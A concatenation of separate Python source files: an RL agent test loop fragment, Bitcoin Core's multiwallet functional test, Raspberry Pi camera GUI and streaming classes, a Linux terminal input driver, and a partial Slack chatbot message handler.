num_episodes -= 1
state_raw = env.Observation()
state = Preprocess(state_raw)
action = agent.Act(state)
for _ in xrange(frame_repeat):
if (test_display):
cv2.imshow("frame-test", state_raw)
cv2.waitKey(20)
if (test_write_video):
out_video.write(state_raw)
reward = env.Act(action, 1)
reward_total += reward
if (not env.IsRunning()):
break
state_raw = env.Observation()
if __name__ == '__main__':
if (lab):
env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
env = EnvVizDoom(vizdoom_scenario)
agent = Agent()
Test(agent)
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Test per-wallet setfeerate and settxfee calls')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.setfeerate(200)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00200000'))
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
w1.setfeerate(30)
assert_equal(w1.getwalletinfo()['paytxfee'], Decimal('0.00030000'))
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
camerasection.py
|
from threading import Thread
from picamera.array import PiRGBArray
from PyQt5.QtWidgets import *
from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtGui import QPixmap, QImage, QIcon
from src.camerasettings import SettingsWindow, CameraSettingsButton
class PreviewWindow(QLabel):
def __init__(self, parent, camera):
super(PreviewWindow, self).__init__(parent)
# set preview window geometry
self.setFixedSize(640,480)
# announce camera object
self.camera = camera
# set no-feed image
self.goat = QImage('resources/goat-small.jpg')
self.setPixmap(QPixmap.fromImage(self.goat))
# set frame
self.setFrameShape(QFrame.Panel)
self.setLineWidth(1)
@pyqtSlot()
def start_preview_thread(self):
# set preview sentinal to true
self.camera.preview_state = True
# start preview pane thread
self.frames_thread = Thread(target = self.frame_getter)
self.frames_thread.start()
@pyqtSlot()
def stop_preview_thread(self):
# set preview state variable to false
self.camera.preview_state = False
# if thread started, wait for it to complete
self.frames_thread.join()
# set no-feed image
self.setPixmap(QPixmap.fromImage(self.goat))
def frame_getter(self):
# set up bit stream for catching frames
capturestream_array = PiRGBArray(self.camera, size = (640, 480))
for frame in self.camera.capture_continuous(capturestream_array, format="rgb", resize=(640, 480), use_video_port=True):
if self.camera.preview_state:
# grab the image array
img = frame.array
height, width, bpc = img.shape
bpl = bpc*width
image = QImage(img.data, width, height, bpl, QImage.Format_RGB888)
# use pixmap to update label (preview pane)
self.setPixmap(QPixmap.fromImage(image))
# clear the stream in preparation for the next frame
capturestream_array.truncate(0)
elif not self.camera.preview_state:
break
class PreviewButton(QPushButton):
# start and stop signals declaration
sig_start_thread = pyqtSignal()
sig_stop_thread = pyqtSignal()
def __init__(self, parent):
super(PreviewButton, self).__init__(QIcon('resources/play.svg'), ' Start Preview Feed', parent)
# announce parent to class and set initial button function to start preview
self.parent = parent
self.clicked.connect(self.start_preview)
def start_preview(self):
# start preview thread
self.sig_start_thread.emit()
# change text, icon and button function
self.clicked.disconnect()
self.setText(' Stop Preview Feed')
self.clicked.connect(self.stop_preview)
self.setIcon(QIcon('resources/square.svg'))
def stop_preview(self):
# stop preview thread
self.sig_stop_thread.emit()
# change text, icon and button function
self.clicked.disconnect()
self.setText(' Start Preview Feed')
self.clicked.connect(self.start_preview)
self.setIcon(QIcon('resources/play.svg'))
class SnapshotButton(QPushButton):
def __init__(self, parent, camera):
super(SnapshotButton, self).__init__(QIcon('resources/camera.svg'), ' Take Picture', parent)
# set initial button function to start preview
self.clicked.connect(camera.capture)
class CameraSection(QGroupBox):
def __init__(self, parent, camera):
super(CameraSection, self).__init__(parent)
# announce parent (main window)
self.main_window = parent
# get customised PiCamera instance
self.camera = camera
# initialise user interface
self.initUI()
def initUI(self):
# general settings
self.setTitle('Camera')
# preview section layout
sublayout_preview = QVBoxLayout()
# initialise widgets
self.previewwindow = PreviewWindow(self.main_window, self.camera)
self.previewbutton = PreviewButton(self.main_window)
self.snapshotbutton = SnapshotButton(self.main_window, self.camera)
self.settingsbutton = CameraSettingsButton(self.main_window, self.camera)
#~ self.cameraselection = QComboBox(self)
# add widgets to vertical box layout
sublayout_preview.addWidget(self.previewwindow)
sublayout_preview.addWidget(self.previewbutton)
sublayout_preview.addWidget(self.snapshotbutton)
sublayout_preview.addWidget(self.settingsbutton)
# set sublayout as widget layout
self.setLayout(sublayout_preview)
# connect signals to slots
self.sigslot_connector()
def sigslot_connector(self):
# connect capture preview buttons
self.previewbutton.sig_start_thread.connect(self.previewwindow.start_preview_thread)
self.previewbutton.sig_stop_thread.connect(self.previewwindow.stop_preview_thread)
|
threads.py
|
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import cv2
# To handle reading threaded frames from the Raspberry Pi camera module
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32):
# initialize the camera and stream
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
linux_driver.py
|
from __future__ import annotations
import asyncio
import os
from codecs import getincrementaldecoder
import selectors
import signal
import sys
import termios
import tty
from typing import Any, TYPE_CHECKING
from threading import Event, Thread
if TYPE_CHECKING:
from rich.console import Console
from .. import log
from .. import events
from ..driver import Driver
from ..geometry import Size
from .._types import MessageTarget
from .._xterm_parser import XTermParser
from .._profile import timer
class LinuxDriver(Driver):
"""Powers display and input for Linux / MacOS"""
def __init__(self, console: "Console", target: "MessageTarget") -> None:
super().__init__(console, target)
self.fileno = sys.stdin.fileno()
self.attrs_before: list[Any] | None = None
self.exit_event = Event()
self._key_thread: Thread | None = None
def _get_terminal_size(self) -> tuple[int, int]:
width: int | None = 80
height: int | None = 25
try:
width, height = os.get_terminal_size(sys.__stdin__.fileno())
except (AttributeError, ValueError, OSError):
try:
width, height = os.get_terminal_size(sys.__stdout__.fileno())
except (AttributeError, ValueError, OSError):
pass
width = width or 80
height = height or 25
return width, height
def _enable_mouse_support(self) -> None:
write = self.console.file.write
write("\x1b[?1000h") # SET_VT200_MOUSE
write("\x1b[?1003h") # SET_ANY_EVENT_MOUSE
write("\x1b[?1015h") # SET_VT200_HIGHLIGHT_MOUSE
write("\x1b[?1006h") # SET_SGR_EXT_MODE_MOUSE
# write("\x1b[?1007h")
self.console.file.flush()
# Note: E.g. lxterminal understands 1000h, but not the urxvt or sgr
# extensions.
def _disable_mouse_support(self) -> None:
write = self.console.file.write
write("\x1b[?1000l") #
write("\x1b[?1003l") #
write("\x1b[?1015l")
write("\x1b[?1006l")
self.console.file.flush()
def start_application_mode(self):
loop = asyncio.get_event_loop()
def on_terminal_resize(signum, stack) -> None:
terminal_size = self._get_terminal_size()
width, height = terminal_size
event = events.Resize(self._target, Size(width, height))
self.console.size = terminal_size
asyncio.run_coroutine_threadsafe(
self._target.post_message(event),
loop=loop,
)
signal.signal(signal.SIGWINCH, on_terminal_resize)
self.console.set_alt_screen(True)
self._enable_mouse_support()
try:
self.attrs_before = termios.tcgetattr(self.fileno)
except termios.error:
# Ignore attribute errors.
self.attrs_before = None
try:
newattr = termios.tcgetattr(self.fileno)
except termios.error:
pass
else:
newattr[tty.LFLAG] = self._patch_lflag(newattr[tty.LFLAG])
newattr[tty.IFLAG] = self._patch_iflag(newattr[tty.IFLAG])
# VMIN defines the number of characters read at a time in
# non-canonical mode. It seems to default to 1 on Linux, but on
# Solaris and derived operating systems it defaults to 4. (This is
# because the VMIN slot is the same as the VEOF slot, which
# defaults to ASCII EOT = Ctrl-D = 4.)
newattr[tty.CC][termios.VMIN] = 1
termios.tcsetattr(self.fileno, termios.TCSANOW, newattr)
self.console.show_cursor(False)
self.console.file.write("\033[?1003h\n")
self.console.file.flush()
self._key_thread = Thread(
target=self.run_input_thread, args=(asyncio.get_event_loop(),)
)
width, height = self.console.size = self._get_terminal_size()
asyncio.run_coroutine_threadsafe(
self._target.post_message(events.Resize(self._target, Size(width, height))),
loop=loop,
)
self._key_thread.start()
@classmethod
def _patch_lflag(cls, attrs: int) -> int:
return attrs & ~(termios.ECHO | termios.ICANON | termios.IEXTEN | termios.ISIG)
@classmethod
def _patch_iflag(cls, attrs: int) -> int:
return attrs & ~(
# Disable XON/XOFF flow control on output and input.
# (Don't capture Ctrl-S and Ctrl-Q.)
# Like executing: "stty -ixon."
termios.IXON
| termios.IXOFF
|
# Don't translate carriage return into newline on input.
termios.ICRNL
| termios.INLCR
| termios.IGNCR
)
def disable_input(self) -> None:
try:
if not self.exit_event.is_set():
signal.signal(signal.SIGWINCH, signal.SIG_DFL)
self._disable_mouse_support()
termios.tcflush(self.fileno, termios.TCIFLUSH)
self.exit_event.set()
if self._key_thread is not None:
self._key_thread.join()
except Exception as error:
# TODO: log this
pass
def stop_application_mode(self) -> None:
self.disable_input()
if self.attrs_before is not None:
try:
termios.tcsetattr(self.fileno, termios.TCSANOW, self.attrs_before)
except termios.error:
pass
with self.console:
self.console.set_alt_screen(False)
self.console.show_cursor(True)
def run_input_thread(self, loop) -> None:
try:
self._run_input_thread(loop)
except Exception:
pass # TODO: log
def _run_input_thread(self, loop) -> None:
selector = selectors.DefaultSelector()
selector.register(self.fileno, selectors.EVENT_READ)
fileno = self.fileno
def more_data() -> bool:
"""Check if there is more data to parse."""
for key, events in selector.select(0.01):
if events:
return True
return False
parser = XTermParser(self._target, more_data)
utf8_decoder = getincrementaldecoder("utf-8")().decode
decode = utf8_decoder
read = os.read
try:
while not self.exit_event.is_set():
selector_events = selector.select(0.1)
for _selector_key, mask in selector_events:
if mask | selectors.EVENT_READ:
unicode_data = decode(read(fileno, 1024))
for event in parser.feed(unicode_data):
self.process_event(event)
except Exception as error:
log(error)
finally:
with timer("selector.close"):
selector.close()
if __name__ == "__main__":
from time import sleep
from rich.console import Console
from .. import events
console = Console()
from ..app import App
class MyApp(App):
async def on_mount(self, event: events.Mount) -> None:
self.set_timer(5, callback=self.close_messages)
MyApp.run()
|
message.py
|
# coding:utf-8
import time
import json
import base64
import re
import hmac
import hashlib
from multiprocessing import Process
import requests
import slack
from flask import Response
from settings import CHATBOT_ENDPOINT, CHATBOT_SECRET_KEY
from modules import team_manager
def handle_message(event_data):
team = team_manager.get_team(event_data['team_id'])
# In case the app doesn't have access to the oAuth Token
if team is None:
print('ERROR: Autenticate the App!')
return Response(status=200)
message = event_data['event']
# If bot reacted own self.
if message['user'] == team.bot_user_id:
return Response(status=200)
if message.get('subtype') is not None:
return Response(status=200)
process = Process(target=background_task, args=(team, message))
process.start()
return Response(status=200)
def background_task(team, message):
user_id = message['user']
# remove mention
text = re.sub('<@[^>]+>', '', message['text'])
# request chatbot
chatbot_response = _request_chatbot(team.id, user_id, text)
# response to user
_send_message_each_format(team.access_token, message['channel'], user_id, chatbot_response)
return
def _send_message_each_format(access_token, channel, user_id, chatbot_response):
client = slack.WebClient(token=access_token)
bubbles = chatbot_response['bubbles']
# send message that formatted for slack to user.
for bbl in bubbles:
if bbl['type'] == 'text' and 'quickButtons' in chatbot_response.keys():
# Form (Quick reply)
pass
elif bbl['type'] == 'template':
# Form (Multiple choice button)
# Multilink
# image
pass
elif bbl['type'] == 'carousel':
# image + text
for card in bbl['data']['cards']:
# _send_message_each_format(access_token, channel, user_id, chatbot_response)
cover = card['data']['cover']
for content in card['data']['contentTable']:
pass
else:
# default
content = bbl['data']['description']
message = '<@%s> %s' % (user_id, content)
client.chat_postMessage(channel=channel, text=message)
def _request_chatbot(team_id, user_id, text):
userId = '{team_id},{user_id}'.format(team_id=team_id, user_id=user_id)
request_body = {
'version': 'v2',
'userId': userId,
'timestamp': _get_timestamp(),
'bubbles': [{
'type': 'text',
'data': {'description': text}
}],
'event': 'send'
}
## Request body
encode_request_body = json.dumps(request_body).encode('UTF-8')
## make signature
signature = _make_signature(CHATBOT_SECRET_KEY, encode_request_body)
## headers
custom_headers = {
'Content-Type': 'application/json;UTF-8',
'X-NCP-CHATBOT_SIGNATURE': signature
}
